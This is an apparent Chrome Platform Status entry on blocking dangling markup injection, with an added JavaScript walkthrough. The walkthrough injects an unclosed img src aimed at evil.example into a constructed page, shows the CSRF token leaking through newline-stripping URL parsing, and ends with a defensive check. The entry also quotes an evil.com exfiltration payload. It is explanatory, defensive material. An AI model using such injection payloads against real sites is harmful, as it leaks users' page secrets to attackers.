As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attack rely on injecting an unclosed attribute that swallows a portion of the page and exfiltrates it to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This works because the URL parser helpfully discards the newline characters contained in the swallowed markup, so the resulting request is still well-formed. It would be lovely if we could make the parser less helpful.
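The mechanism above, worked through as an added example (this is not Chromium code and not part of the original entry): a constructed page with an injected unclosed `src` attribute, the URL the WHATWG parser (as implemented by Node's `URL`) would actually produce once newlines are stripped, and a defensive pre-parse check in the spirit of the mitigation described here. The exact rule used in `looksLikeDanglingMarkup` (raw newline or carriage return together with a `<`) and the host name `evil.example` are assumptions for illustration.

```javascript
// Added example, not Chromium's implementation. Shows why newline-stripping
// in the URL parser makes dangling-markup exfiltration work, and a check a
// defender can apply to the *raw* attribute value before parsing.

// Constructed victim page: the attacker controls only the text after
// "Hello, " and injects an unclosed single-quoted img src attribute.
const INJECTION = "<img src='https://evil.example/?";
const PAGE = [
  "<p>Hello, " + INJECTION + "</p>",
  '<form action="/transfer">',
  '  <input type="hidden" name="csrf" value="abc123">', // constructed secret
  "</form>",
  "<p>Don't forget to log out.</p>", // the apostrophe closes the attribute
].join("\n");

// Mimic what an HTML tokenizer sees: the attribute value runs from the
// injection point to the next single quote, newlines and all.
function extractDanglingSrc(html, marker) {
  const start = html.indexOf(marker) + "<img src='".length;
  const end = html.indexOf("'", start);
  return html.slice(start, end);
}

// The request the browser would issue: the WHATWG parser removes ASCII tab,
// LF and CR from its input, so the swallowed markup becomes one long query.
function parsedRequestUrl(rawSrc) {
  return new URL(rawSrc).href;
}

// Defensive check (assumed rule, modelled on the Chrome 61 mitigation):
// inspect the value *before* the parser discards the evidence. A raw
// newline/CR together with '<' is a strong sign of dangling markup and the
// subresource request should be refused rather than sent.
function looksLikeDanglingMarkup(rawSrc) {
  return /[\r\n]/.test(rawSrc) && rawSrc.includes("<");
}

function demo() {
  const raw = extractDanglingSrc(PAGE, INJECTION);
  return {
    raw,                                   // contains "\n" and the csrf value
    parsed: parsedRequestUrl(raw),         // newline-free, percent-encoded
    blocked: looksLikeDanglingMarkup(raw), // true: the check fires
  };
}

console.log(demo());
```

Note that the check has to run on the unparsed string: once `new URL()` has returned, the newlines are gone and the query looks like any other long query, which is exactly why the parser's "helpfulness" is the problem.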
Specification
Status in Chromium
Removed (tracking bug) in:
- Chrome for desktop release 61
- Chrome for Android release 61
- Android WebView release 61
Consensus & Standardization
After a feature ships in Chrome, the values listed here are not guaranteed to be up to date.
- No signal
- No signal
- No signal
- No signals
Owner
Last updated on 2020-11-09